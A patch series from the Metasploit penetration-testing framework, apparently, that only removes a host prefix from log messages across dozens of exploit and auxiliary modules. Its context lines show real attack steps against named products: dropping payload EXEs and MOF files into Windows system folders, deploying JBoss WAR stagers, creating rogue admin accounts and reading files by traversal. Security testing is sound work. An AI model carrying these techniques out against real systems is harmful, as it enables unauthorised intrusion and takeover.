Exploit::CheckCode::Safe end end @@ -115,9 +115,9 @@ class Metasploit3 < Msf::Exploit::Remote if !res fail_with(Failure::Unknown, "#{peer} - Connection failed.") elsif res == "\x00\x00\x00\x00" - print_status "#{peer} - Received reply (#{res.length} bytes)" + print_status "Received reply (#{res.length} bytes)" else - print_warning "#{peer} - Unexpected reply (#{res.length} bytes)" + print_warning "Unexpected reply (#{res.length} bytes)" end end @@ -129,15 +129,15 @@ class Metasploit3 < Msf::Exploit::Remote exe = generate_payload_exe exe_name = "#{rand_text_alpha(rand(10) + 5)}.exe" if target.name =~ /Automatic/ or target.name =~ /Vista/ - print_status("#{peer} - Writing EXE to startup for all users (#{exe.length} bytes)") + print_status("Writing EXE to startup for all users (#{exe.length} bytes)") upload("#{depth}\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\#{exe_name}", exe) end if target.name =~ /Automatic/ or target.name =~ /XP/ - print_status("#{peer} - Sending EXE (#{exe.length} bytes)") + print_status("Sending EXE (#{exe.length} bytes)") upload("#{depth}\\WINDOWS\\system32\\#{exe_name}", exe) mof_name = "#{rand_text_alpha(rand(10) + 5)}.mof" mof = generate_mof(::File.basename(mof_name), ::File.basename(exe_name)) - print_status("#{peer} - Sending MOF (#{mof.length} bytes)") + print_status("Sending MOF (#{mof.length} bytes)") upload("#{depth}\\WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof) register_file_for_cleanup("wbem\\mof\\good\\#{::File.basename(mof_name)}") end diff --git a/modules/exploits/windows/mysql/mysql_mof.rb b/modules/exploits/windows/mysql/mysql_mof.rb index f0147cad1f..9c292c9619 100644 --- a/modules/exploits/windows/mysql/mysql_mof.rb +++ b/modules/exploits/windows/mysql/mysql_mof.rb @@ -92,17 +92,17 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Attempting to login as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'") + print_status("Attempting to login as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'") begin m = mysql_login(datastore['USERNAME'], datastore['PASSWORD']) return if not m rescue RbMysql::AccessDeniedError - print_error("#{peer} - Access denied.") + print_error("Access denied.") return end if not is_windows? - print_error("#{peer} - Remote host isn't Windows.") + print_error("Remote host isn't Windows.") return end @@ -110,24 +110,24 @@ class Metasploit3 < Msf::Exploit::Remote exe_name = Rex::Text::rand_text_alpha(5) + ".exe" dest = "#{drive}:/windows/system32/#{exe_name}" exe = generate_payload_exe - print_status("#{peer} - Uploading to '#{dest}'") + print_status("Uploading to '#{dest}'") begin upload_file(exe, dest) register_file_for_cleanup("#{exe_name}") rescue RbMysql::AccessDeniedError - print_error("#{peer} - No permission to write. I blame kc :-)") + print_error("No permission to write. I blame kc :-)") return end mof_name = Rex::Text::rand_text_alpha(5) + ".mof" dest = "#{drive}:/windows/system32/wbem/mof/#{mof_name}" mof = generate_mof(mof_name, exe_name) - print_status("#{peer} - Uploading to '#{dest}'") + print_status("Uploading to '#{dest}'") begin upload_file(mof, dest) register_file_for_cleanup("wbem\\mof\\good\\#{mof_name}") rescue RbMysql::AccessDeniedError - print_error("#{peer} - No permission to write. Bail!") + print_error("No permission to write. Bail!") return end end diff --git a/modules/exploits/windows/mysql/mysql_start_up.rb b/modules/exploits/windows/mysql/mysql_start_up.rb index 29a09fcac5..5628daeca3 100644 --- a/modules/exploits/windows/mysql/mysql_start_up.rb +++ b/modules/exploits/windows/mysql/mysql_start_up.rb @@ -102,7 +102,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::BadConfig, "STARTUP_FOLDER should start and end with '/' Ex: /programdata/microsoft/windows/start menu/programs/startup/") end - print_status("#{peer} - Attempting to login as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'") + print_status("Attempting to login as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'") begin m = mysql_login(datastore['USERNAME'], datastore['PASSWORD']) rescue RbMysql::AccessDeniedError @@ -127,7 +127,7 @@ class Metasploit3 < Msf::Exploit::Remote dest = "#{drive}:#{datastore['STARTUP_FOLDER']}#{exe_name}" exe = generate_payload_exe - print_status("#{peer} - Uploading to '#{dest}'") + print_status("Uploading to '#{dest}'") begin upload_file(exe, dest) rescue RbMysql::AccessDeniedError diff --git a/modules/exploits/windows/novell/file_reporter_fsfui_upload.rb b/modules/exploits/windows/novell/file_reporter_fsfui_upload.rb index fd2883bd84..79b9157845 100644 --- a/modules/exploits/windows/novell/file_reporter_fsfui_upload.rb +++ b/modules/exploits/windows/novell/file_reporter_fsfui_upload.rb @@ -104,13 +104,13 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Generating VBS file...") mof_content = generate_mof("#{@var_mof_name}.mof", "#{@var_vbs_name}.vbs") - print_status("#{peer} - Uploading the VBS file") + print_status("Uploading the VBS file") worked = upload_file("WINDOWS\\system32\\#{@var_vbs_name}.vbs", vbs_content) unless worked fail_with(Failure::NotVulnerable, "Failed to upload the file") end - print_status("#{peer} - Uploading the MOF file") + print_status("Uploading the MOF file") upload_file("WINDOWS\\system32\\wbem\\mof\\#{@var_mof_name}.mof", mof_content) end @@ -132,9 +132,9 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.body.include? "<RESULT><VERSION>1</VERSION><STATUS>0</STATUS></RESULT>" - print_warning("#{peer} - File successfully uploaded: #{filename}") + print_warning("File successfully uploaded: #{filename}") else - print_error("#{peer} - Failed to upload the file") + print_error("Failed to upload the file") return false end diff --git a/modules/exploits/windows/scada/ge_proficy_cimplicity_gefebt.rb b/modules/exploits/windows/scada/ge_proficy_cimplicity_gefebt.rb index 5b423dfa65..451686637c 100644 --- a/modules/exploits/windows/scada/ge_proficy_cimplicity_gefebt.rb +++ b/modules/exploits/windows/scada/ge_proficy_cimplicity_gefebt.rb @@ -270,7 +270,7 @@ End Sub end def execute_bcl(i) - print_status("#{peer} - Executing BCL code #{@basename}#{i}.bcl to drop final payload...") + print_status("Executing BCL code #{@basename}#{i}.bcl to drop final payload...") uri = normalize_uri(target_uri.to_s, "CimWeb", "gefebt.exe") uri << "?#{@exploit_unc}#{@share_name}\\#{@basename}#{i}.bcl" @@ -280,12 +280,12 @@ End Sub # We use res.to_s because the embedded CIMPLICITY Web server doesn't # answer with valid HTTP responses. if res and res.code == 200 and res.to_s =~ /(^Error.*$)/ - print_error("#{peer} - Server answered with error: $1") + print_error("Server answered with error: $1") fail_with(Failure::Unknown, "#{peer} - Server answered with error") elsif res and res.code == 200 and res.to_s =~ /No such file or directory/ fail_with(Failure::BadConfig, "#{peer} - The target wasn't able to access the remote BCL file") elsif res and res.code == 200 - print_good("#{peer} - '200 OK' answer indicates success!") + print_good("'200 OK' answer indicates success!") else fail_with(Failure::Unknown, "#{peer} - Unknown error") end @@ -296,7 +296,7 @@ End Sub execute_bcl(i) end - print_status("#{peer} - Executing #{@exe_filename}...") + print_status("Executing #{@exe_filename}...") uri = normalize_uri(target_uri.to_s, "CimWeb", @exe_filename) uri << "?" diff --git a/modules/exploits/windows/smb/psexec.rb b/modules/exploits/windows/smb/psexec.rb index 362dd6e87d..7b7c816897 100644 --- a/modules/exploits/windows/smb/psexec.rb +++ b/modules/exploits/windows/smb/psexec.rb @@ -171,7 +171,7 @@ class Metasploit3 < Msf::Exploit::Remote end # Execute the powershell command - print_status("#{peer} - Executing the payload...") + print_status("Executing the payload...") begin psexec(command) rescue StandardError => exec_command_error diff --git a/modules/exploits/windows/smb/psexec_psh.rb b/modules/exploits/windows/smb/psexec_psh.rb index 0c45d00c83..17727557a0 100644 --- a/modules/exploits/windows/smb/psexec_psh.rb +++ b/modules/exploits/windows/smb/psexec_psh.rb @@ -90,7 +90,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NoAccess, "#{peer} - Unable to authenticate with given credentials: #{autherror}") end # Execute the powershell command - print_status("#{peer} - Executing the payload...") + print_status("Executing the payload...") begin return psexec(command) rescue StandardError => exec_command_error From 8094eb631b93e80dc68a94d6cd5deb220a4c25aa Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Mon, 1 Feb 2016 16:06:34 -0600 Subject: [PATCH 257/686] Do the same for aux modules --- .../admin/hp/hp_imc_som_create_account.rb | 22 +++---- .../admin/http/axigen_file_access.rb | 28 ++++----- .../auxiliary/admin/http/iis_auth_bypass.rb | 6 +- .../admin/http/intersil_pass_reset.rb | 20 +++--- .../auxiliary/admin/http/jboss_bshdeployer.rb | 26 ++++---- .../http/jboss_deploymentfilerepository.rb | 26 ++++---- .../admin/http/kaseya_master_admin.rb | 8 +-- .../http/linksys_tmunblock_admin_reset_bof.rb | 22 +++---- .../http/manage_engine_dc_create_admin.rb | 4 +- .../admin/http/manageengine_dir_listing.rb | 14 ++--- .../admin/http/manageengine_file_download.rb | 16 ++--- .../admin/http/manageengine_pmp_privesc.rb | 14 ++--- .../admin/http/mutiny_frontend_read_delete.rb | 24 +++---- .../admin/http/netflow_file_download.rb | 10 +-- .../http/netgear_soap_password_extractor.rb | 20 +++--- .../http/novell_file_reporter_filedelete.rb | 6 +- .../admin/http/sophos_wpa_traversal.rb | 12 ++-- .../auxiliary/admin/http/sysaid_admin_acct.rb | 4 +- .../admin/http/sysaid_file_download.rb | 8 +-- .../auxiliary/admin/http/sysaid_sql_creds.rb | 2 +- .../admin/http/vbulletin_upgrade_admin.rb | 8 +-- .../admin/http/wp_custom_contact_forms.rb | 12 ++-- .../http/wp_easycart_privilege_escalation.rb | 26 ++++---- .../http/wp_wplms_privilege_escalation.rb | 20 +++--- .../admin/misc/sercomm_dump_config.rb | 22 +++---- .../mssql/mssql_enum_domain_accounts_sqli.rb | 28 ++++----- .../mssql/mssql_escalate_dbowner_sqli.rb | 32 +++++----- .../mssql/mssql_escalate_execute_as_sqli.rb | 36 +++++------ .../advantech_webaccess_dbvisitor_sqli.rb | 10 +-- modules/auxiliary/admin/smb/psexec_command.rb | 24 +++---- .../auxiliary/admin/smb/psexec_ntdsgrab.rb | 48 +++++++------- .../admin/webmin/edit_html_fileaccess.rb | 14 ++--- .../dos/http/apache_commons_fileupload_dos.rb | 2 +- .../dos/http/f5_bigip_apm_max_sessions.rb | 22 +++---- .../dos/http/ms15_034_ulonglongadd.rb | 10 +-- .../dos/http/novell_file_reporter_heap_bof.rb | 8 +-- .../dos/http/rails_json_float_dos.rb | 16 ++--- .../dos/http/wordpress_long_password_dos.rb | 16 ++--- .../dos/http/wordpress_xmlrpc_dos.rb | 18 +++--- .../dos/misc/ibm_sametime_webplayer_dos.rb | 48 +++++++------- .../gather/alienvault_iso27001_sqli.rb | 16 ++--- .../gather/alienvault_newpolicyform_sqli.rb | 20 +++--- .../auxiliary/gather/coldfusion_pwd_props.rb | 12 ++-- .../gather/doliwamp_traversal_creds.rb | 34 +++++----- modules/auxiliary/gather/drupal_openid_xxe.rb | 14 ++--- modules/auxiliary/gather/eaton_nsm_creds.rb | 8 +-- .../gather/f5_bigip_cookie_disclosure.rb | 18 +++--- .../auxiliary/gather/hp_snac_domain_creds.rb | 12 ++-- modules/auxiliary/gather/huawei_wifi_info.rb | 18 +++--- .../gather/ibm_sametime_enumerate_users.rb | 38 ++++++------ .../gather/ibm_sametime_room_brute.rb | 14 ++--- .../auxiliary/gather/ibm_sametime_version.rb | 10 +-- modules/auxiliary/gather/java_rmi_registry.rb | 20 +++--- .../gather/konica_minolta_pwd_extract.rb | 10 +-- .../auxiliary/gather/memcached_extractor.rb | 12 ++-- .../auxiliary/gather/mybb_db_fingerprint.rb | 16 ++--- .../auxiliary/gather/vbulletin_vote_sqli.rb | 16 ++--- .../gather/wp_all_in_one_migration_export.rb | 4 +- .../wp_ultimate_csv_importer_user_extract.rb | 8 +-- .../gather/xerox_workcentre_5xxx_ldap.rb | 32 +++++----- .../auxiliary/scanner/couchdb/couchdb_enum.rb | 6 +- .../scanner/elasticsearch/indices_enum.rb | 10 +-- .../a10networks_ax_directory_traversal.rb | 10 +-- .../scanner/http/apache_mod_cgi_bash_env.rb | 2 +- .../http/bitweaver_overlay_type_traversal.rb | 12 ++-- .../auxiliary/scanner/http/cisco_asa_asdm.rb | 18 +++--- .../auxiliary/scanner/http/cisco_ssl_vpn.rb | 26 ++++---- .../scanner/http/cisco_ssl_vpn_priv_esc.rb | 32 +++++----- .../scanner/http/clansphere_traversal.rb | 8 +-- .../auxiliary/scanner/http/dolibarr_login.rb | 16 ++--- .../scanner/http/drupal_views_user_enum.rb | 4 +- .../scanner/http/elasticsearch_traversal.rb | 10 +-- .../scanner/http/etherpad_duo_login.rb | 16 ++--- .../auxiliary/scanner/http/f5_mgmt_scanner.rb | 16 ++--- .../auxiliary/scanner/http/gitlab_login.rb | 4 +- .../scanner/http/goahead_traversal.rb | 4 +- .../scanner/http/hp_imc_som_file_download.rb | 8 +-- ...hp_sitescope_getfileinternal_fileaccess.rb | 20 +++--- .../hp_sitescope_getsitescopeconfiguration.rb | 18 +++--- ...hp_sitescope_loadfilecontent_fileaccess.rb | 12 ++-- .../scanner/http/hp_sys_mgmt_login.rb | 8 +-- .../auxiliary/scanner/http/influxdb_enum.rb | 16 ++--- .../auxiliary/scanner/http/jenkins_enum.rb | 24 +++---- .../http/joomla_ecommercewd_sqli_scanner.rb | 4 +- .../http/joomla_gallerywd_sqli_scanner.rb | 6 +- .../auxiliary/scanner/http/joomla_pages.rb | 10 +-- .../auxiliary/scanner/http/joomla_plugins.rb | 20 +++--- .../manageengine_deviceexpert_user_creds.rb | 14 ++--- .../manageengine_securitymanager_traversal.rb | 8 +-- .../http/ms15_034_http_sys_memory_dump.rb | 6 +- .../scanner/http/netgear_sph200d_traversal.rb | 14 ++--- .../novell_file_reporter_fsfui_fileaccess.rb | 6 +- .../novell_file_reporter_srs_fileaccess.rb | 6 +- .../scanner/http/ntlm_info_enumeration.rb | 6 +- .../scanner/http/openmind_messageos_login.rb | 16 ++--- ...acle_demantra_database_credentials_leak.rb | 8 +-- .../scanner/http/oracle_ilom_login.rb | 16 ++--- .../auxiliary/scanner/http/pocketpad_login.rb | 16 ++--- .../scanner/http/radware_appdirector_enum.rb | 16 ++--- .../auxiliary/scanner/http/rips_traversal.rb | 4 +- .../auxiliary/scanner/http/s40_traversal.rb | 10 +-- .../http/servicedesk_plus_traversal.rb | 10 +-- .../scanner/http/smt_ipmi_49152_exposure.rb | 8 +-- .../scanner/http/smt_ipmi_cgi_scanner.rb | 14 ++--- .../http/smt_ipmi_url_redirect_traversal.rb | 18 +++--- ...support_center_plus_directory_traversal.rb | 28 ++++----- .../http/symantec_brightmail_logfile.rb | 12 ++-- .../scanner/http/typo3_bruteforce.rb | 8 +-- modules/auxiliary/scanner/http/vcms_login.rb | 10 +-- .../scanner/http/wildfly_traversal.rb | 6 +- .../http/wordpress_cp_calendar_sqli.rb | 6 +- .../scanner/http/wordpress_ghost_scanner.rb | 8 +-- .../scanner/http/wordpress_xmlrpc_login.rb | 2 +- .../http/wp_contus_video_gallery_sqli.rb | 6 +- .../scanner/http/wp_dukapress_file_read.rb | 4 +- .../http/wp_gimedia_library_file_read.rb | 4 +- .../http/wp_mobile_pack_info_disclosure.rb | 6 +- .../http/wp_mobileedition_file_read.rb | 4 +- .../http/wp_nextgen_galley_file_read.rb | 16 ++--- .../http/wp_simple_backup_file_read.rb | 6 +- .../http/wp_subscribe_comments_file_read.rb | 20 +++--- .../auxiliary/scanner/misc/java_rmi_server.rb | 8 +-- .../scanner/misc/sunrpc_portmapper.rb | 4 +- .../scanner/mysql/mysql_file_enum.rb | 22 +++---- .../auxiliary/scanner/redis/redis_server.rb | 6 +- .../auxiliary/scanner/rsync/modules_list.rb | 20 +++--- .../scanner/sap/sap_mgmt_con_brute_login.rb | 2 +- .../scanner/smb/psexec_loggedin_users.rb | 28 ++++----- .../auxiliary/scanner/smb/smb_uninit_cred.rb | 8 +-- modules/auxiliary/scanner/smtp/smtp_relay.rb | 24 +++---- modules/auxiliary/scanner/ssl/openssl_ccs.rb | 14 ++--- .../scanner/ssl/openssl_heartbleed.rb | 62 +++++++++---------- .../voip/cisco_cucdm_call_forward.rb | 14 ++--- .../auxiliary/voip/cisco_cucdm_speed_dials.rb | 36 +++++------ 134 files changed, 987 insertions(+), 987 deletions(-) diff --git a/modules/auxiliary/admin/hp/hp_imc_som_create_account.rb b/modules/auxiliary/admin/hp/hp_imc_som_create_account.rb index 1941291594..3f21a39c33 100644 --- a/modules/auxiliary/admin/hp/hp_imc_som_create_account.rb +++ b/modules/auxiliary/admin/hp/hp_imc_som_create_account.rb @@ -99,21 +99,21 @@ class Metasploit3 < Msf::Auxiliary def run - print_status("#{peer} - Trying to find the service desk service strong name...") + print_status("Trying to find the service desk service strong name...") service_desk = get_service_desk_strong_name if service_desk.nil? - print_error("#{peer} - service desk service not found.") + print_error("service desk service not found.") return end - print_good("#{peer} - service desk strong number found: #{service_desk}") + print_good("service desk strong number found: #{service_desk}") - print_status("#{peer} - Trying to find the AccountService strong name...") + print_status("Trying to find the AccountService strong name...") account_service = get_account_service_strong_name(service_desk) if account_service.nil? - print_error("#{peer} - AccountService service not found.") + print_error("AccountService service not found.") return end - print_good("#{peer} - AccountService strong number found: #{account_service}") + print_good("AccountService strong number found: #{account_service}") header= "6|0|39" # version | unknown | string_table size @@ -234,7 +234,7 @@ class Metasploit3 < Msf::Auxiliary service_url = ssl ? "https://" : "http://" service_url << "#{rhost}:#{rport}/servicedesk/servicedesk/" - print_status("#{peer} - Trying to create account #{datastore["USERNAME"]}...") + print_status("Trying to create account #{datastore["USERNAME"]}...") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri("servicedesk", "servicedesk", "accountSerivce.gwtsvc"), @@ -247,12 +247,12 @@ class Metasploit3 < Msf::Auxiliary }) unless res and res.code == 200 - print_error("#{peer} - Unknown error while creating the user.") + print_error("Unknown error while creating the user.") return end if res.body =~ /Username.*already exists/ - print_error("#{peer} - The user #{datastore["USERNAME"]} already exists.") + print_error("The user #{datastore["USERNAME"]} already exists.") return elsif res.body =~ /Account.*added successfully/ login_url = ssl ? "https://" : "http://" @@ -267,8 +267,8 @@ class Metasploit3 < Msf::Auxiliary proof: "#{login_url}\n#{res.body}" ) - print_good("#{peer} - Account #{datastore["USERNAME"]}/#{datastore["PASSWORD"]} created successfully.") - print_status("#{peer} - Use it to log into #{login_url}") + print_good("Account #{datastore["USERNAME"]}/#{datastore["PASSWORD"]} created successfully.") + print_status("Use it to log into #{login_url}") end end diff --git a/modules/auxiliary/admin/http/axigen_file_access.rb b/modules/auxiliary/admin/http/axigen_file_access.rb index 7b4925a4ca..6e6a7939a0 100644 --- a/modules/auxiliary/admin/http/axigen_file_access.rb +++ b/modules/auxiliary/admin/http/axigen_file_access.rb @@ -51,11 +51,11 @@ class Metasploit3 < Msf::Auxiliary end def run - print_status("#{peer} - Trying to login") + print_status("Trying to login") if login - print_good("#{peer} - Login successful") + print_good("Login successful") else - print_error("#{peer} - Login failed, review USERNAME and PASSWORD options") + print_error("Login failed, review USERNAME and PASSWORD options") return end @@ -67,7 +67,7 @@ class Metasploit3 < Msf::Auxiliary @traversal.gsub!(/\//, "\\") file.gsub!(/\//, "\\") else # unix - print_error("#{peer} - *nix platform detected, vulnerability is only known to work on Windows") + print_error("*nix platform detected, vulnerability is only known to work on Windows") return end @@ -81,7 +81,7 @@ class Metasploit3 < Msf::Auxiliary def read_file(file) - print_status("#{peer} - Retrieving file contents...") + print_status("Retrieving file contents...") res = send_request_cgi( { @@ -96,14 +96,14 @@ class Metasploit3 < Msf::Auxiliary if res and res.code == 200 and res.headers['Content-Type'] and res.body.length > 0 store_path = store_loot("axigen.webadmin.data", "application/octet-stream", rhost, res.body, file) - print_good("#{peer} - File successfully retrieved and saved on #{store_path}") + print_good("File successfully retrieved and saved on #{store_path}") else - print_error("#{peer} - Failed to retrieve file") + print_error("Failed to retrieve file") end end def delete_file(file) - print_status("#{peer} - Deleting file #{file}") + print_status("Deleting file #{file}") res = send_request_cgi( { @@ -119,14 +119,14 @@ class Metasploit3 < Msf::Auxiliary }) if res and res.code == 200 and res.body =~ /View Log Files/ - print_good("#{peer} - File #{file} deleted") + print_good("File #{file} deleted") else - print_error("#{peer} - Error deleting file #{file}") + print_error("Error deleting file #{file}") end end def get_platform - print_status("#{peer} - Retrieving platform") + print_status("Retrieving platform") res = send_request_cgi( { @@ -140,15 +140,15 @@ class Metasploit3 < Msf::Auxiliary if res and res.code == 200 if res.body =~ /Windows/ - print_good("#{peer} - Windows platform found") + print_good("Windows platform found") return 'windows' elsif res.body =~ /Linux/ - print_good("#{peer} - Linux platform found") + print_good("Linux platform found") return 'unix' end end - print_warning("#{peer} - Platform not found, assuming UNIX flavor") + print_warning("Platform not found, assuming UNIX flavor") return 'unix' end diff --git a/modules/auxiliary/admin/http/iis_auth_bypass.rb b/modules/auxiliary/admin/http/iis_auth_bypass.rb index 4601c36955..0d999c859a 100644 --- a/modules/auxiliary/admin/http/iis_auth_bypass.rb +++ b/modules/auxiliary/admin/http/iis_auth_bypass.rb @@ -77,16 +77,16 @@ class Metasploit3 < Msf::Auxiliary def run if not has_auth - print_error("#{peer} - No basic authentication enabled") + print_error("No basic authentication enabled") return end bypass_string = try_auth if bypass_string.empty? - print_error("#{peer} - The bypass attempt did not work") + print_error("The bypass attempt did not work") else - print_good("#{peer} - You can bypass auth by doing: #{bypass_string}") + print_good("You can bypass auth by doing: #{bypass_string}") end end diff --git a/modules/auxiliary/admin/http/intersil_pass_reset.rb b/modules/auxiliary/admin/http/intersil_pass_reset.rb index 335c0e050d..036a3ee2cc 100644 --- a/modules/auxiliary/admin/http/intersil_pass_reset.rb +++ b/modules/auxiliary/admin/http/intersil_pass_reset.rb @@ -52,17 +52,17 @@ class Metasploit3 < Msf::Auxiliary }) if (res and (m = res.headers['Server'].match(/Boa\/(.*)/))) - vprint_status("#{peer} - Boa Version Detected: #{m[1]}") + vprint_status("Boa Version Detected: #{m[1]}") return Exploit::CheckCode::Safe if (m[1][0].ord-48>0) # boa server wrong version return Exploit::CheckCode::Safe if (m[1][3].ord-48>4) return Exploit::CheckCode::Vulnerable else - vprint_status("#{peer} - Not a Boa Server!") + vprint_status("Not a Boa Server!") return Exploit::CheckCode::Safe # not a boa server end rescue Rex::ConnectionRefused - print_error("#{peer} - Connection refused by server.") + print_error("Connection refused by server.") return Exploit::CheckCode::Safe end end @@ -80,14 +80,14 @@ class Metasploit3 < Msf::Auxiliary }) if res.nil? - print_error("#{peer} - The server may be down") + print_error("The server may be down") return elsif res and res.code != 401 - print_status("#{peer} - #{uri} does not have basic authentication enabled") + print_status("#{uri} does not have basic authentication enabled") return end - print_status("#{peer} - Server still operational. Checking to see if password has been overwritten") + print_status("Server still operational. Checking to see if password has been overwritten") res = send_request_cgi({ 'uri' => uri, 'method'=> 'GET', @@ -95,17 +95,17 @@ class Metasploit3 < Msf::Auxiliary }) if not res - print_error("#{peer} - Server timedout, will not continue") + print_error("Server timedout, will not continue") return end case res.code when 200 - print_good("#{peer} - Password reset successful with admin:#{datastore['PASSWORD']}") + print_good("Password reset successful with admin:#{datastore['PASSWORD']}") when 401 - print_error("#{peer} - Access forbidden. The password reset attempt did not work") + print_error("Access forbidden. The password reset attempt did not work") else - print_status("#{peer} - Unexpected response: Code #{res.code} encountered") + print_status("Unexpected response: Code #{res.code} encountered") end end diff --git a/modules/auxiliary/admin/http/jboss_bshdeployer.rb b/modules/auxiliary/admin/http/jboss_bshdeployer.rb index 63883fbf56..1e1d9dbf8d 100644 --- a/modules/auxiliary/admin/http/jboss_bshdeployer.rb +++ b/modules/auxiliary/admin/http/jboss_bshdeployer.rb @@ -49,13 +49,13 @@ class Metasploit3 < Msf::Auxiliary encoded_payload = Rex::Text.encode_base64(war_data).gsub(/\n/, '') if http_verb == 'POST' - print_status("#{peer} - Deploying payload...") + print_status("Deploying payload...") opts = { :file => "#{app_base}.war", :contents => encoded_payload } else - print_status("#{peer} - Deploying stager...") + print_status("Deploying stager...") stager_name = Rex::Text.rand_text_alpha(8 + rand(8)) stager_contents = stager_jsp(app_base) opts = { @@ -69,37 +69,37 @@ class Metasploit3 < Msf::Auxiliary package = deploy_bsh(bsh_payload) if package.nil? - print_error("#{peer} - Deployment failed") + print_error("Deployment failed") return else - print_good("#{peer} - Deployment successful") + print_good("Deployment successful") end unless http_verb == 'POST' # call the stager to deploy our real payload war stager_uri = '/' + stager_name + '/' + stager_name + '.jsp' payload_data = "#{Rex::Text.rand_text_alpha(8+rand(8))}=#{Rex::Text.uri_encode(encoded_payload)}" - print_status("#{peer} - Calling stager #{stager_uri} to deploy final payload...") + print_status("Calling stager #{stager_uri} to deploy final payload...") res = deploy('method' => 'POST', 'data' => payload_data, 'uri' => stager_uri) if res && res.code == 200 - print_good("#{peer} - Payload deployed") + print_good("Payload deployed") else - print_error("#{peer} - Failed to deploy final payload") + print_error("Failed to deploy final payload") end # Remove the stager - print_status("#{peer} - Removing stager...") + print_status("Removing stager...") files = {} files[:stager_jsp_name] = "#{stager_name}.war/#{stager_name}.jsp" files[:stager_base] = "#{stager_name}.war" delete_script = generate_bsh(:delete, files) res = deploy_package(delete_script, package) if res.nil? - print_error("#{peer} - Unable to remove Stager") + print_error("Unable to remove Stager") else - print_good("#{peer} - Stager successfully removed") + print_good("Stager successfully removed") end end @@ -107,7 +107,7 @@ class Metasploit3 < Msf::Auxiliary def undeploy_action(app_base) # Undeploy the WAR and the stager if needed - print_status("#{peer} - Undeploying #{app_base} by deleting the WAR file via BSHDeployer...") + print_status("Undeploying #{app_base} by deleting the WAR file via BSHDeployer...") files = {} files[:app_base] = "#{app_base}.war" @@ -115,9 +115,9 @@ class Metasploit3 < Msf::Auxiliary package = deploy_bsh(delete_script) if package.nil? - print_error("#{peer} - Unable to remove WAR") + print_error("Unable to remove WAR") else - print_good("#{peer} - Successfully removed") + print_good("Successfully removed") end end diff --git a/modules/auxiliary/admin/http/jboss_deploymentfilerepository.rb b/modules/auxiliary/admin/http/jboss_deploymentfilerepository.rb index 64cbb4fa8b..a427ac2009 100644 --- a/modules/auxiliary/admin/http/jboss_deploymentfilerepository.rb +++ b/modules/auxiliary/admin/http/jboss_deploymentfilerepository.rb @@ -51,10 +51,10 @@ class Metasploit3 < Msf::Auxiliary stager_contents = stager_jsp_with_payload(app_base, encoded_payload) if http_verb == 'POST' - print_status("#{peer} - Deploying stager for the WAR file...") + print_status("Deploying stager for the WAR file...") res = upload_file(stager_base, stager_jsp_name, stager_contents) else - print_status("#{peer} - Deploying minimal stager to upload the payload...") + print_status("Deploying minimal stager to upload the payload...") head_stager_jsp_name = Rex::Text.rand_text_alpha(8+rand(8)) head_stager_contents = head_stager_jsp(stager_base, stager_jsp_name) head_stager_uri = "/" + stager_base + "/" + head_stager_jsp_name + ".jsp" @@ -79,20 +79,20 @@ class Metasploit3 < Msf::Auxiliary fail_with(Failure::Unknown, "Failed to deploy") end - print_status("#{peer} - Calling stager to deploy the payload warfile (might take some time)") + print_status("Calling stager to deploy the payload warfile (might take some time)") stager_uri = '/' + stager_base + '/' + stager_jsp_name + '.jsp' stager_res = deploy('uri' => stager_uri, 'method' => 'GET') if res && res.code == 200 - print_good("#{peer} - Payload deployed") + print_good("Payload deployed") else - print_error("#{peer} - Failed to deploy final payload") + print_error("Failed to deploy final payload") end # Cleaning stagers - print_status("#{peer} - Undeploying stagers via DeploymentFileRepository.remove()...") - print_status("#{peer} - This might take some time, be patient...") if http_verb == "HEAD" + print_status("Undeploying stagers via DeploymentFileRepository.remove()...") + print_status("This might take some time, be patient...") if http_verb == "HEAD" delete_res = [] if head_stager_jsp_name delete_res << delete_file(stager_base + '.war', head_stager_jsp_name, '.jsp') @@ -101,28 +101,28 @@ class Metasploit3 < Msf::Auxiliary delete_res << delete_file('./', stager_base + '.war', '') delete_res.each do |res| if !res - print_warning("#{peer} - Unable to remove WAR [No Response]") + print_warning("Unable to remove WAR [No Response]") elsif (res.code < 200 || res.code >= 300) - print_warning("#{peer} - WARNING: Unable to remove WAR [#{res.code} #{res.message}]") + print_warning("WARNING: Unable to remove WAR [#{res.code} #{res.message}]") end end end # Undeploy the WAR and the stager if needed def undeploy_action(app_base) - print_status("#{peer} - Undeploying #{app_base} via DeploymentFileRepository.remove()...") + print_status("Undeploying #{app_base} via DeploymentFileRepository.remove()...") print_status("This might take some time, be patient...") if http_verb == "HEAD" res = delete_file('./', app_base + '.war', '') unless res - print_error("#{peer} - Unable to remove WAR (no response)") + print_error("Unable to remove WAR (no response)") return end if res.code < 200 || res.code >= 300 - print_error("#{peer} - Unable to remove WAR [#{res.code} #{res.message}]") + print_error("Unable to remove WAR [#{res.code} #{res.message}]") else - print_good("#{peer} - Successfully removed") + print_good("Successfully removed") end end diff --git a/modules/auxiliary/admin/http/kaseya_master_admin.rb b/modules/auxiliary/admin/http/kaseya_master_admin.rb index 5703684ca9..d7046167c7 100644 --- a/modules/auxiliary/admin/http/kaseya_master_admin.rb +++ b/modules/auxiliary/admin/http/kaseya_master_admin.rb @@ -53,11 +53,11 @@ class Metasploit3 < Msf::Auxiliary if res && res.body && res.body.to_s =~ /ID="sessionVal" name="sessionVal" value='([0-9]*)'/ session_val = $1 else - print_error("#{peer} - Failed to get sessionVal") + print_error("Failed to get sessionVal") return end - print_status("#{peer} - Got sessionVal #{session_val}, creating Master Administrator account") + print_status("Got sessionVal #{session_val}, creating Master Administrator account") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'LocalAuth', 'setAccount.aspx'), @@ -73,11 +73,11 @@ class Metasploit3 < Msf::Auxiliary }) unless res && res.code == 302 && res.body && res.body.to_s.include?('/vsapres/web20/core/login.asp') - print_error("#{peer} - Master Administrator account creation failed") + print_error("Master Administrator account 